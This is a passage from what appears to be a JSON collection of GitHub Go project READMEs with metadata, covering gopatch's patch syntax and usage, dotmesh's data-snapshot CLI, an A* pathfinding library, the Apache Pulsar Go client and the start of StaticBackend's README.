you're using Go < 1.16, use `go get github.com/uber-go/gopatch@latest` instead.\n\n## Your first patch\n\nWrite your first patch.\n\n```shell\n$ cat > ~/s1028.patch\n@@\n@@\n-import \"errors\"\n\n-errors.New(fmt.Sprintf(...))\n+fmt.Errorf(...)\n```\n\nThis patch is a fix for staticcheck [S1028]. It searches for uses of\n[`fmt.Sprintf`] with [`errors.New`], and simplifies them by replacing them\nwith [`fmt.Errorf`].\n\n [S1028]: https://staticcheck.io/docs/checks#S1028\n [`fmt.Sprintf`]: https://golang.org/pkg/fmt/#Sprintf\n [`errors.New`]: https://golang.org/pkg/errors/#New\n [`fmt.Errorf`]: https://golang.org/pkg/fmt/#Errorf\n\nFor example,\n\n```go\nreturn errors.New(fmt.Sprintf(\"invalid port: %v\", err))\n// becomes\nreturn fmt.Errorf(\"invalid port: %v\", err)\n```\n\n## Apply the patch\n\n- `cd` to your Go project's directory.\n\n ```shell\n $ cd ~/go/src/example.com/myproject\n ```\n\n Run `gopatch` on the project, supplying the previously written patch with the\n `-p` flag.\n\n ```shell\n $ gopatch -p ~/s1028.patch ./...\n ```\n\n This will apply the patch on all Go code in your project.\n\n Check if there were any instances of this issue in your code by running\n `git diff`.\n- Instead, `cd` to your Go project's directory.\n\n ```shell\n $ cd ~/go/src/example.com/myproject\n ```\n\n Run `gopatch` on the project, supplying the previously written patch with the\n `-p` flag along with '-d' flag.\n\n ```shell\n $ gopatch -d -p ~/s1028.patch ./...\n ```\n\n This will turn on diff mode and will write the diff to stdout instead of modifying all\n the Go code in your project. To provide more context on what the patch does, if\n there were description comments in the patch, they will also get displayed at \n the top. To learn more about description comments jump to section [here](#description-comments)\n \n For example if we applied patch ~/s1028 to our testfile error.go\n ```shell\n $ gopatch -d -p ~/s1028.patch ./testdata/test_files/diff_example/\n ```\n Output would be : \n ```\n gopatch/testdata/test_files/diff_example/error.go:Replace redundant fmt.Sprintf with fmt.Errorf\n --- gopatch/testdata/test_files/diff_example/error.go\n +++ gopatch/testdata/test_files/diff_example/error.go\n @@ -7,7 +7,7 @@\n \n func foo() error {\n err := errors.New(\"test\")\n - return errors.New(fmt.Sprintf(\"error: %v\", err))\n + return fmt.Errorf(\"error: %v\", err)\n }\n \n func main() {\n\n ```\n Note: Only the description comments of patches that actually **apply** are displayed.\n\n## Next steps\n\nTo learn how to write your own patches, move on to the [Patches] section. To\ndive deeper into patches, check out [Patches in depth].\n\n [Patches in depth]: docs/PatchesInDepth.md\n\nTo experiment with other sample patches, check out the [Examples] section.\n\n [Patches]: #patches\n [Examples]: #examples\n\n# Usage\n\nTo use the gopatch command line tool, provide the following arguments.\n\n```\ngopatch [options] pattern ...\n```\n\nWhere pattern specifies one or more Go files, or directories containing Go\nfiles. For directories, all Go code inside them and their descendants will be\nconsidered by gopatch.\n\n## Options\n\ngopatch supports the following command line options.\n\n- `-p file`, `--patch=file`\n\n Path to a patch file specifying a transformation. Read more about the\n patch file format in [Patches].\n\n Provide this flag multiple times to apply multiple patches in-order.\n\n ```shell\n $ gopatch -p foo.patch -p bar.patch path/to/my/project\n ```\n\n If this flag is omitted, a patch is expected on stdin.\n\n ```shell\n $ gopatch path/to/my/project << EOF\n @@\n @@\n -foo\n +bar\n EOF\n ```\n- `-d`, `--diff`\n\n Flag to turn on diff mode. Provide this flag to write the diff to stdout instead\n of modifying the file and display applied patches' [description comments](#description-comments) if they exist. \n Use in conjunction with -p to provide patch file.\n \n Only need to apply the flag once to turn on diff mode\n\n ```shell\n $ gopatch -d -p foo.patch -p bar.patch path/to/my/project\n ```\n\n If this flag is omitted, normal patching occurs which modifies the\n file instead.\n- `--print-only`\n \n Flag to turn on print-only mode. Provide this flag to write the changed code to stdout instead of modifying the\n file and display applied patches' description comments to stderr if they exist.\n \n ```shell\n $ gopatch --print-only -p foo.patch -p bar.patch path/to/my/project\n ```\n \n\n# Patches\n\nPatch files are the input to gopatch that specify how to transform code. Each\npatch file contains one or more patches. This section provides an introduction\nto writing patches; look at [Patches in depth] for a more detailed\nexplanation.\n\nEach patch specifies a code transformation. These are formatted like unified\ndiffs: lines prefixed with `-` specify matching code should be deleted, and\nlines prefixed with `+` specify that new code should be added.\n\nConsider the following patch.\n\n```diff\n@@\n@@\n-foo\n+bar\n```\n\nIt specifies that we want to search for references to the identifier `foo` and\nreplace them with references to `bar`. (Ignore the lines with `@@` for now.\nWe will cover those below.)\n\nA more selective version of this patch will search for uses of `foo` where it\nis called as a function with specific arguments.\n\n```diff\n@@\n@@\n-foo(42)\n+bar(42)\n```\n\nThis will search for invocations of `foo` as a function with the specified\nargument, and replace only those with `bar`.\n\ngopatch understands Go syntax, so the above is equivalent to the following.\n\n```diff\n@@\n@@\n-foo(\n+bar(\n 42,\n )\n```\n\n## Metavariables\n\nSearching for hard-coded exact parameters is limited. We should be able to\ngeneralize our patches.\n\nThe previously ignored `@@` section of patches is referred to as the\n**metavariable section**. That is where we specify **metavariables** for the\npatch.\n\nMetavariables will match any code, to be reproduced later. Think of them like\nholes to be filled by the code we match. For example,\n\n```diff\n@@\nvar x expression\n@@\n# rest of the patch\n```\n\nThis specifies that `x` should match any Go expression and record its match\nfor later reuse.\n\n> **What is a Go expression?**\n>\n> Expressions usually refer to code that has value. You can pass these as\n> arguments to functions. These include `x`, `foo()`, `user.Name`, etc.\n>\n> Check the [Identifiers vs expressions vs statements] section of the appendix\n> for more.\n\n [Identifiers vs expressions vs statements]: docs/Appendix.md#identifiers-vs-expressions-vs-statements\n\nSo the following patch will search for invocations of `foo` with a single\nargument---any argument---and replace them with invocations of `bar` with the\nsame argument.\n\n```diff\n@@\nvar x expression\n@@\n-foo(x)\n+bar(x)\n```\n\n| Input | Output |\n|--------------------|--------------------|\n| `foo(42)` | `bar(42)` |\n| `foo(answer)` | `bar(answer)` |\n| `foo(getAnswer())` | `bar(getAnswer())` |\n\n\nMetavariables hold the entire matched value, so we can add code around them\nwithout risk of breaking anything.\n\n```diff\n@@\nvar x expression\n@@\n-foo(x)\n+bar(x + 3, true)\n```\n\n| Input | Output |\n|--------------------|------------------------------|\n| `foo(42)` | `bar(42 + 3, true)` |\n| `foo(answer)` | `bar(answer + 3, true)` |\n| `foo(getAnswer())` | `bar(getAnswer() + 3, true)` |\n\nFor more on metavariables see [Patches in depth/Metavariables].\n\n [Patches in depth/Metavariables]: docs/PatchesInDepth.md#metavariables\n\n## Statements\n\ngopatch patches are not limited to transforming basic expressions. You can\nalso transform statements.\n\n> **What is a Go statements?**\n>\n> Statements are instructions to do things, and do not have value. They cannot\n> be passed as parameters to other functions. These include assignments\n> (`foo := bar()`), if statements (`if foo { bar() }`), variable declarations\n> (`var foo Bar`), and so on.\n>\n> Check the [Identifiers vs expressions vs statements] section of the appendix\n> for more.\n\nFor example, consider the following patch.\n\n```diff\n@@\nvar f expression\nvar err identifier\n@@\n-err = f\n-if err != nil {\n+if err := f; err != nil {\n return err\n }\n```\n\nThe patch declares two metavariables:\n\n- `f`: This represents an operation that possibly returns an `error`\n- `err`: This represents the name of the `error` variable\n\nThe patch will search for code that assigns to an error variable immediately\nbefore returning it, and inlines the assignment into the `if` statement. This\neffectively [reduces the scope of the variable] to just the `if` statement.\n\n [reduces the scope of the variable]: https://github.com/uber-go/guide/blob/master/style.md#reduce-scope-of-variables\n\n\n\n\n\n\n
InputOutput
\n\n```go\nerr = foo(bar, baz)\nif err != nil {\n return err\n}\n```\n\n\n\n```go\nif err := foo(bar, baz); err != nil {\n return err\n}\n```\n\n
\n\n```go\nerr = comment.Submit(ctx)\nif err != nil {\n return err\n}\n```\n\n\n\n```go\nif err := comment.Submit(ctx); err != nil {\n return err\n}\n```\n\n
\n\nFor more on transforming statements, see [Patches In Depth/Statements].\n\n [Patches In Depth/Statements]: docs/PatchesInDepth.md#statements\n\n## Elision\n\nMatching a single argument is still too selective and we may want to match a\nwider criteria.\n\nFor this, gopatch supports **elision** of code by adding `...` in many places.\nFor example,\n\n```diff\n@@\n@@\n-foo(...)\n+bar(...)\n```\n\nThe patch above looks for all calls to the function `foo` and replaces them\nwith calls to the function `bar`, regardless of the number of arguments they\nhave.\n\n| Input | Output |\n|----------------------------|----------------------------|\n| `foo(42)` | `bar(42)` |\n| `foo(42, true, 1)` | `bar(42, true, 1)` |\n| `foo(getAnswer(), x(y()))` | `bar(getAnswer(), x(y()))` |\n\nGoing back to the patch from [Statements], we can instead write the following\npatch.\n\n [Statements]: #statements\n\n```diff\n@@\nvar f expression\nvar err identifier\n@@\n-err = f\n-if err != nil {\n+if err := f; err != nil {\n return ..., err\n }\n```\n\nThis patch is almost exactly the same as before except the `return` statement\nwas changed to `return ..., err`. This will allow the patch to operate even on\nfunctions that return multiple values.\n\n\n\n\n\n
InputOutput
\n\n```go\nerr = foo()\nif err != nil {\n return false, err\n}\n```\n\n\n\n```go\nif err := foo(); err != nil {\n return false, err\n}\n```\n\n
\n\nFor more on elision, see [Patches in depth/Elision].\n\n [Patches in depth/Elision]: docs/PatchesInDepth.md#elision\n\n## Comments\n\nPatches come with comments to give more context about what they do.\n\nComments are prefixed by '#'\n\nFor example:\n\n```\n# Replace time.Now().Sub(x) with time.Since(x)\n@@\n# var x is in the metavariable section \nvar x identifier\n@@\n\n-time.Now().Sub(x)\n+time.Since(x)\n# We replace time.Now().Sub(x)\n# with time.Since(x)\n```\n\n#### Description comments\n\nDescription comments are comments that appear directly above a patch's first\n`@@` line.\ngopatch will record these descriptions and display them to users with use of\nthe `--diff` or `--print-only` flags.\n\nFor example,\n\n```\n# Replace time.Now().Sub(x) with time.Since(x)\n@@\n# Not a description comment\nvar x identifier\n@@\n\n-time.Now().Sub(x)\n+time.Since(x)\n# Not a description comment\n# Not a description comment\n```\n\nPatch files with multiple patches can have a separate description for each\npatch.\n\n```\n# Replace redundant fmt.Sprintf with fmt.Errorf\n@@\n@@\n\n-import \"errors\"\n-errors.New(fmt.Sprintf(...))\n+fmt.Errorf(...)\n\n# Replace time.Now().Sub(x) with time.Since(x)\n@@\nvar x identifier\n@@\n\n-time.Now().Sub(x)\n+time.Since(x)\n# Not a description comment\n```\n\nAs these are messages that will be printed to users of the patch,\nwe recommend the following best practices for description comments.\n\n- Keep them short and on a single-line\n- Use imperative mood (\"replace X with Y\", not \"replaces X with Y\")\n\n#### Usage with `--diff`\n\nWhen diff mode is turned on by the `-d`/`--diff` flag, gopatch will print\ndescription comments for patches that matched different files to stderr.\n\n```shell\n$ gopatch -d -p ~/s1028.patch testdata/test_files/diff_example/error.go\nerror.go:Replace redundant fmt.Sprintf with fmt.Errorf\n--- error.go\n+++ error.go\n@@ -7,7 +7,7 @@\n\nfunc foo() error {\n err := errors.New(\"test\")\n- return errors.New(fmt.Sprintf(\"error: %v\", err))\n+ return fmt.Errorf(\"error: %v\", err)\n}\n\n func main() {\n```\n\nNote that gopatch will print only the description comments in diff mode.\nOther comments will be ignored.\n\n# Examples\n\nThis section lists various example patches you can try in your code.\nNote that some of these patches are not perfect and may have false positives.\n\n- [s1012.patch](examples/s1012.patch): Fix for staticcheck [S1012](https://staticcheck.io/docs/checks#S1012).\n- [s1028.patch](examples/s1028.patch): Fix for staticcheck [S1028](https://staticcheck.io/docs/checks#S1028).\n- [s1038.patch](examples/s1038.patch): Fix for staticcheck [S1038](https://staticcheck.io/docs/checks#S1038).\n- [gomock-v1.5.0.patch](examples/gomock-v1.5.0.patch): Drops unnecessary call to `Finish` method for users of gomock.\n- [destutter.patch](examples/destutter.patch): Demonstrates renaming a type and updating its consumers.\n\n# Project status\n\nThe project is currently is in a beta state. It works but significant features\nare planned that may result in breaking changes to the patch format.\n\n## Goals\n\ngopatch aims to be a generic power tool that you can use in lieu of simple\nsearch-and-replace.\n\ngopatch will attempt to do 80% of the work for you in a transformation, but it\ncannot guarantee 100% correctness or completeness. Part of this is owing to\nthe decision that gopatch must be able to operate on code that doesn't yet\ncompile, which can often be the case in the middle of a refactor. We may add\nfeatures in the future that require compilable code, but we plan to always\nsupport transformation of partially-valid Go code.\n\n## Known issues\n\nBeyond the known issues highlighted above, there are a handful of other issues\nwith using gopatch today.\n\n- It's very quiet, so there's no indication of progress. [#7]\n- Error messages for invalid patch files are hard to decipher. [#8]\n- Matching elisions between the `-` and `+` sections does not always work in a\n desirable way. We may consider replacing anonymous `...` elision with a\n different named elision syntax to address this issue. [#9]\n- When elision is used, gopatch stops replacing after the first instance in\n the given scope which is often not what you want. [#10]\n- Formatting of output generated by gopatch isn't always perfect.\n\n [#7]: https://github.com/uber-go/gopatch/issues/7\n [#8]: https://github.com/uber-go/gopatch/issues/8\n [#9]: https://github.com/uber-go/gopatch/issues/9\n [#10]: https://github.com/uber-go/gopatch/issues/10\n\n## Upcoming\n\nBesides addressing the various limitations and issues we've already mentioned,\nwe have a number of features planned for gopatch.\n\n- Contextual matching: match context (like a function declaration), and then\n run a transformation inside the function body repeatedly, at any depth. [#11]\n- Collateral changes: Match and capture values in one patch, and use those in\n a following patch in the same file.\n- Metavariable constraints: Specify constraints on metavariables, e.g.\n matching a string, or part of another metavariable.\n- Condition elision: An elision should match only if a specified condition is\n also true.\n\n [#11]: https://github.com/uber-go/gopatch/issues/11\n\n# Contributing\n\nIf you'd like to contribute to gopatch, you may find the following documents\nuseful:\n\n- [HACKING](docs/HACKING.md) documents the architecture, code organization, and\n other information necessary to contribute to the project.\n- [RELEASE](docs/RELEASE.md) documents the process for releasing a new version\n of gopatch.\n\n# Similar Projects\n\n- [rf] is a refactoring tool with a custom DSL\n- [gofmt rewrite rules] support simple transformations on expressions\n- [eg] supports basic example-based refactoring\n- [Coccinelle] is a tool for C from which gopatch takes inspiration heavily\n- [Semgrep] is a cross-language semantic search tool\n- [Comby] is a language-agnostic search and transformation tool\n\n [gofmt rewrite rules]: https://golang.org/cmd/gofmt/\n [eg]: https://godoc.org/golang.org/x/tools/cmd/eg\n [Coccinelle]: https://coccinelle.gitlabpages.inria.fr/website/\n [Semgrep]: https://semgrep.dev/\n [Comby]: https://comby.dev/\n [rf]: https://github.com/rsc/rf\n\n# Credits\n\ngopatch is heavily inspired by [Coccinelle].\n", "readme_type": "markdown", "hn_comments": "I used to work on the team that built this tool, and I've been eagerly awaiting its open source release. Of course, I think it's fantastic :)There's so much interesting work being done on static analysis in Go (semgrep, ruleguard, etc), but I haven't seen similarly powerful refactoring tools. Gopatch is one approach to building a refactoring power tool - I'm excited to start using it, but I hope that it also inspires people (and companies!) to build even more capable tools.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bmhatfield/go-runtime-metrics", "link": "https://github.com/bmhatfield/go-runtime-metrics", "tags": ["golang", "runtime", "runtime-metrics", "stats", "statsd", "go"], "stars": 542, "description": "Collect Golang Runtime Metrics, outputting to a stats handler", "lang": "Go", "repo_lang": "", "readme": "# go-runtime-metrics\nCollect Golang Runtime Metrics, outputting to a stats handler (currently, statsd)\n\nThe intent of this library is to be a \"side effect\" import. You can kick off the collector merely by importing this into your main:\n\n`import _ \"github.com/bmhatfield/go-runtime-metrics\"`\n\nThis library has a few optional flags it depends on. It won't be able to output stats until you call `flag.Parse()`, which is generally done in your `func main() {}`.\n\nOnce imported and running, you can expect a number of Go runtime metrics to be sent to statsd over UDP. An example of what this looks like:\n\n![Dashboard Screenshot](/screenshot.png?raw=true)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dotmesh-io/dotmesh", "link": "https://github.com/dotmesh-io/dotmesh", "tags": [], "stars": 541, "description": "dotmesh (dm) is like git for your data volumes (databases, files etc) in Docker and Kubernetes", "lang": "Go", "repo_lang": "", "readme": "# dotmesh: git for data\n\n[![pipeline status](https://gitlab.dotmesh.com/dotmesh/dotmesh/badges/master/pipeline.svg)](https://gitlab.dotmesh.com/dotmesh/dotmesh/commits/master)\n\nDotmesh is a **git-like CLI for capturing, organizing and sharing application states**.\n\nIn other words, it's a **snapshotting tool for databases** and other filesystem states.\n\nThe application states that dotmesh captures are stored in **datadots**.\n\nIt can capture the state of multiple databases, each one in a [subdot](https://docs.dotmesh.com/concepts/what-is-a-datadot/#subdots), in a single atomic commit.\n\n## installing on docker (Mac or Ubuntu 16.04+)\n\nInstall the dotmesh client `dm`:\n\n```plain\nsudo curl -sSL -o /usr/local/bin/dm \\\n https://get.dotmesh.io/$(uname -s)/dm\n```\n\nMake the client binary executable.\n```plain\nsudo chmod +x /usr/local/bin/dm\n```\n\nThen use the client to install `dotmesh-server`, assuming you have Docker installed and your user account has access to the Docker daemon.\n\n```plain\ndm cluster init\n```\n\n```plain\nChecking suitable Docker is installed... yes, got 17.12.0-ce.\nChecking dotmesh isn't running... done.\nPulling dotmesh-server docker image...\n[...]\n```\n\nThis will set up a single-instance cluster on your local machine.\n\nVerify that the `dm` client can talk to the `dotmesh-server`:\n```\ndm version\n```\n\nIf the installation fails, please [report an issue](https://github.com/dotmesh-io/dotmesh).\nYou can also experiment in our [online learning environment](https://dotmesh.com/try-dotmesh/).\nThanks!\n\nSee [the installation docs](https://docs.dotmesh.com/install-setup/) for more details, including installing dotmesh on Kubernetes.\n\n\n\n\n## getting started guide\n\nTry our [hosted tutorial](https://dotmesh.com/try-dotmesh/)!\n\nAlternatively, try the [hello Dotmesh on Docker](https://docs.dotmesh.com/tutorials/hello-dotmesh-docker/) guided tutorial.\n\n## what is a datadot?\n\nA **datadot** allows you to capture your application's state and treat it like a `git` repo.\n\nA simple example is to start a PostgreSQL container using a datadot called `myapp`:\n\n```bash\ndocker run -d --volume-driver dm \\\n -v myapp:/var/lib/postgresql/data --name postgres postgres:9.6.6\n```\n\nThis creates a datadot called `myapp`, creates the writeable filesystem for the default `master` branch in that datadot, mounts the writeable filesystem for the `master` branch into `/var/lib/postgresql/data` in the `postgres` container, and starts the `postgres` container, like this:\n\n![myapp dot with master branch and postgres container's /data volume attached](datadot.png \"Diagram of a datadot\")\n\nFirst, switch to it, which, like `cd`'ing into a git repo, makes it the \"current\" dot -- the dot which later `dm` commands will operate on by default:\n\n```bash\ndm switch myapp\n```\n\nYou can then see the `dm list` output:\n\n```bash\ndm list\n```\n\n```plain\n DOT BRANCH SERVER CONTAINERS SIZE COMMITS DIRTY\n* myapp master a1b2c3d /postgres 40.82 MiB 0 40.82 MiB\n```\nThe current branch is shown in the `BRANCH` column and the current dot is marked with a `*` in the `dm list` output.\n\n## what's next?\n\n* Learn more in the [concept docs](https://docs.dotmesh.com/concepts/what-is-a-datadot/).\n* Try another [tutorial](https://docs.dotmesh.com/tutorials/).\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "beefsack/go-astar", "link": "https://github.com/beefsack/go-astar", "tags": [], "stars": 541, "description": "Go implementation of the A* search algorithm", "lang": "Go", "repo_lang": "", "readme": "go-astar\n========\n\n**A\\* pathfinding implementation for Go**\n\n[![Build Status](https://travis-ci.org/beefsack/go-astar.svg?branch=master)](https://travis-ci.org/beefsack/go-astar)\n\nThe [A\\* pathfinding algorithm](http://en.wikipedia.org/wiki/A*_search_algorithm) is a pathfinding algorithm noted for its performance and accuracy and is commonly used in game development. It can be used to find short paths for any weighted graph.\n\nA fantastic overview of A\\* can be found at [Amit Patel's Stanford website](http://theory.stanford.edu/~amitp/GameProgramming/AStarComparison.html).\n\nExamples\n--------\n\nThe following crude examples were taken directly from the automated tests. Please see `path_test.go` for more examples.\n\n### Key\n\n* `.` - Plain (movement cost 1)\n* `~` - River (movement cost 2)\n* `M` - Mountain (movement cost 3)\n* `X` - Blocker, unable to move through\n* `F` - From / start position\n* `T` - To / goal position\n* `\u25cf` - Calculated path\n\n### Straight line\n\n```\n.....~...... .....~......\n.....MM..... .....MM.....\n.F........T. -> .\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf.\n....MMM..... ....MMM.....\n............ ............\n```\n\n### Around a mountain\n\n```\n.....~...... .....~......\n.....MM..... .....MM.....\n.F..MMMM..T. -> .\u25cf\u25cf\u25cfMMMM\u25cf\u25cf\u25cf.\n....MMM..... ...\u25cfMMM\u25cf\u25cf...\n............ ...\u25cf\u25cf\u25cf\u25cf\u25cf....\n```\n\n### Blocked path\n\n```\n............ \n.........XXX\n.F.......XTX -> No path\n.........XXX\n............\n```\n\n### Maze\n\n```\nFX.X........ \u25cfX.X\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf..\n.X...XXXX.X. \u25cfX\u25cf\u25cf\u25cfXXXX\u25cfX.\n.X.X.X....X. -> \u25cfX\u25cfX.X\u25cf\u25cf\u25cf\u25cfX.\n...X.X.XXXXX \u25cf\u25cf\u25cfX.X\u25cfXXXXX\n.XX..X.....T .XX..X\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf\n```\n\n### Mountain climber\n\n```\n..F..M...... ..\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf\u25cf.\n.....MM..... .....MM...\u25cf.\n....MMMM..T. -> ....MMMM..\u25cf.\n....MMM..... ....MMM.....\n............ ............\n```\n\n### River swimmer\n\n```\n.....~...... .....~......\n.....~...... ....\u25cf\u25cf\u25cf.....\n.F...X...T.. -> .\u25cf\u25cf\u25cf\u25cfX\u25cf\u25cf\u25cf\u25cf..\n.....M...... .....M......\n.....M...... .....M......\n```\n\nUsage\n-----\n\n### Import the package\n\n```go\nimport \"github.com/beefsack/go-astar\"\n```\n\n### Implement Pather interface\n\nAn example implementation is done for the tests in `path_test.go` for the Tile type.\n\nThe `PathNeighbors` method should return a slice of the direct neighbors.\n\nThe `PathNeighborCost` method should calculate an exact movement cost for direct neighbors.\n\nThe `PathEstimatedCost` is a heuristic method for estimating the distance between arbitrary tiles. The examples in the test files use [Manhattan distance](http://en.wikipedia.org/wiki/Taxicab_geometry) to estimate orthogonal distance between tiles.\n\n```go\ntype Tile struct{}\n\nfunc (t *Tile) PathNeighbors() []astar.Pather {\n\treturn []astar.Pather{\n\t\tt.Up(),\n\t\tt.Right(),\n\t\tt.Down(),\n\t\tt.Left(),\n\t}\n}\n\nfunc (t *Tile) PathNeighborCost(to astar.Pather) float64 {\n\treturn to.MovementCost\n}\n\nfunc (t *Tile) PathEstimatedCost(to astar.Pather) float64 {\n\treturn t.ManhattanDistance(to)\n}\n```\n\n### Call Path function\n\n```go\n// t1 and t2 are *Tile objects from inside the world.\npath, distance, found := astar.Path(t1, t2)\nif !found {\n\tlog.Println(\"Could not find path\")\n}\n// path is a slice of Pather objects which you can cast back to *Tile.\n```\n\nAuthors\n-------\n\nMichael Alexander \nRobin Ranjit Chauhan \n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "apache/pulsar-client-go", "link": "https://github.com/apache/pulsar-client-go", "tags": ["pulsar", "pubsub", "messaging", "streaming", "queuing", "event-streaming", "golang", "go"], "stars": 541, "description": "Apache Pulsar Go Client Library", "lang": "Go", "repo_lang": "", "readme": "\n[![PkgGoDev](https://pkg.go.dev/badge/github.com/apache/pulsar-client-go)](https://pkg.go.dev/github.com/apache/pulsar-client-go)\n[![Go Report Card](https://goreportcard.com/badge/github.com/apache/pulsar-client-go)](https://goreportcard.com/report/github.com/apache/pulsar-client-go)\n[![Language](https://img.shields.io/badge/Language-Go-blue.svg)](https://golang.org/)\n[![LICENSE](https://img.shields.io/hexpm/l/pulsar.svg)](https://github.com/apache/pulsar-client-go/blob/master/LICENSE)\n# Apache Pulsar Go Client Library\n\nA Go client library for [Apache Pulsar](https://pulsar.apache.org/).\n\n## Purpose\n\nThis project is a pure-Go client library for Pulsar that does not\ndepend on the C++ Pulsar library.\n\nOnce feature parity and stability are reached, this will supersede the current\nCGo based library.\n\n## Requirements\n\n- Go 1.18+\n\n> **Note**:\n>\n> While this library should work with Golang versions as early as 1.16, any bugs specific to versions earlier than 1.18 may not be fixed.\n\n## Status\n\nCheck the Projects page at https://github.com/apache/pulsar-client-go/projects for\ntracking the status and the progress.\n\n## Usage\n\nImport the client library:\n\n```go\nimport \"github.com/apache/pulsar-client-go/pulsar\"\n```\n\nCreate a Producer:\n\n```go\nclient, err := pulsar.NewClient(pulsar.ClientOptions{\n URL: \"pulsar://localhost:6650\",\n})\n\ndefer client.Close()\n\nproducer, err := client.CreateProducer(pulsar.ProducerOptions{\n\tTopic: \"my-topic\",\n})\n\n_, err = producer.Send(context.Background(), &pulsar.ProducerMessage{\n\tPayload: []byte(\"hello\"),\n})\n\ndefer producer.Close()\n\nif err != nil {\n fmt.Println(\"Failed to publish message\", err)\n} else {\n fmt.Println(\"Published message\")\n}\n```\n\nCreate a Consumer:\n\n```go\nclient, err := pulsar.NewClient(pulsar.ClientOptions{\n URL: \"pulsar://localhost:6650\",\n})\n\ndefer client.Close()\n\nconsumer, err := client.Subscribe(pulsar.ConsumerOptions{\n Topic: \"my-topic\",\n SubscriptionName: \"my-sub\",\n Type: pulsar.Shared,\n })\n\ndefer consumer.Close()\n\nmsg, err := consumer.Receive(context.Background())\n if err != nil {\n log.Fatal(err)\n }\n\nfmt.Printf(\"Received message msgId: %#v -- content: '%s'\\n\",\n msg.ID(), string(msg.Payload()))\n\n```\n\nCreate a Reader:\n\n```go\nclient, err := pulsar.NewClient(pulsar.ClientOptions{URL: \"pulsar://localhost:6650\"})\nif err != nil {\n\tlog.Fatal(err)\n}\n\ndefer client.Close()\n\nreader, err := client.CreateReader(pulsar.ReaderOptions{\n\tTopic: \"topic-1\",\n\tStartMessageID: pulsar.EarliestMessageID(),\n})\nif err != nil {\n\tlog.Fatal(err)\n}\ndefer reader.Close()\n\nfor reader.HasNext() {\n\tmsg, err := reader.Next(context.Background())\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tfmt.Printf(\"Received message msgId: %#v -- content: '%s'\\n\",\n\t\tmsg.ID(), string(msg.Payload()))\n}\n```\n\n## Build and Test\n\nBuild the sources:\n\n make build\n\nRun the tests:\n\n make test\n\nRun the tests with specific versions of GOLANG and PULSAR:\n\n make test GOLANG_VERSION=1.18 PULSAR_VERSION=2.10.0\n\n## Contributing\n\nContributions are welcomed and greatly appreciated. See [CONTRIBUTING.md](CONTRIBUTING.md) for details on submitting patches and the contribution workflow.\n\n## Community\n\n##### Mailing lists\n\n| Name | Scope | | | |\n|:----------------------------------------------------------|:--------------------------------|:------------------------------------------------------|:----------------------------------------------------------|:-------------------------------------------------------------------|\n| [users@pulsar.apache.org](mailto:users@pulsar.apache.org) | User-related discussions | [Subscribe](mailto:users-subscribe@pulsar.apache.org) | [Unsubscribe](mailto:users-unsubscribe@pulsar.apache.org) | [Archives](http://mail-archives.apache.org/mod_mbox/pulsar-users/) |\n| [dev@pulsar.apache.org](mailto:dev@pulsar.apache.org) | Development-related discussions | [Subscribe](mailto:dev-subscribe@pulsar.apache.org) | [Unsubscribe](mailto:dev-unsubscribe@pulsar.apache.org) | [Archives](http://mail-archives.apache.org/mod_mbox/pulsar-dev/) |\n\n##### Slack\n\nPulsar slack channel `#dev-go` at https://apache-pulsar.slack.com/\n\nYou can self-register at https://apache-pulsar.herokuapp.com/\n\n## License\n\nLicensed under the Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0\n\n## Troubleshooting\n\n### Go module 'ambiguous import' error\n\nIf you've upgraded from a previous version of this library, you may run into an 'ambigous import' error when building.\n\n```\ngithub.com/apache/pulsar-client-go/oauth2: ambiguous import: found package github.com/apache/pulsar-client-go/oauth2 in multiple modules\n```\n\nThe fix for this is to make sure you don't have any references in your `go.mod` file to the old oauth2 module path. So remove any lines\nsimilar to the following, and then run `go mod tidy`.\n\n```\ngithub.com/apache/pulsar-client-go/oauth2 v0.0.0-20220630195735-e95cf0633348 // indirect\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "staticbackendhq/core", "link": "https://github.com/staticbackendhq/core", "tags": ["dbaas", "backend-api"], "stars": 541, "description": "Backend server API handling user mgmt, database, storage and real-time component", "lang": "Go", "repo_lang": "", "readme": "

\n\t\"StaticBackend\n\t
\n\t\n\t\t\n\t\n\t\n\t\t\n\t\n\t\n

\n\np.s. If you'd like to contribute to an active Go project, you've found a nice \none in my biased opinion.\n\n# StaticBackend - simple backend for your apps\n\n[StaticBackend](https://staticbackend.com) is a simple backend API that handles \nuser management, database, file storage, forms, real-time experiences via \nchannel/topic-based communication, and server-side functions for web and mobile \napplications.\n\nYou can think of it as a lightweight Firebase replacement you may self-host. Less \nvendor lock-in, and your data stays in your control.\n\nYou may use its building blocks from one or a combination of:\n\n* Client-side JavaScript\n* Server-side client libraries (Node, Go, Python)\n* Import a Go package directly in your Go programs\n\n### Table of content\n\n* [Import as Go package](#import-as-go-package)\n* [What can you build](#what-can-you-build)\n* [How it works / dev workflow](#how-it-works--dev-workflow)\n* [Get started with the self-hosted version](#get-started-with-the-self-hosted-version)\n* [Documentation](#documentation)\n* [Librairies & CLI](#librairies--cli)\n* [Examples](#examples)\n* [Deploying in production](#deploying-in-production)\n* [Feedback & contributing](#feedback--contributing)\n* [help](#help)\n\n\n## Import as Go package\n\nAs of v1.4.1 StaticBackend offers an importable Go package removing the need \nto self-host the backend API separately while keeping all functionalities from \nyour Go program.\n\n### Installing\n\n```sh\n$ go get github.com/staticbackendhq/core/backend\n```\n\n### Example usage\n\n```go\n// using the cache & pub/sub\nbackend.Cache.Set(\"key\", \"value\")\n\nmsg := model.Command{Type: \"chan_out\", Channel: \"#lobby\", Data: \"hello world\"}\nbackend.Cache.Publish(msg)\n\n// use the generic Collection for strongly-typed CRUD and querying\ntype Task struct {\n\tID string `json:\"id\"`\n\tTitle string `json:\"title\"`\n}\n// auth is the 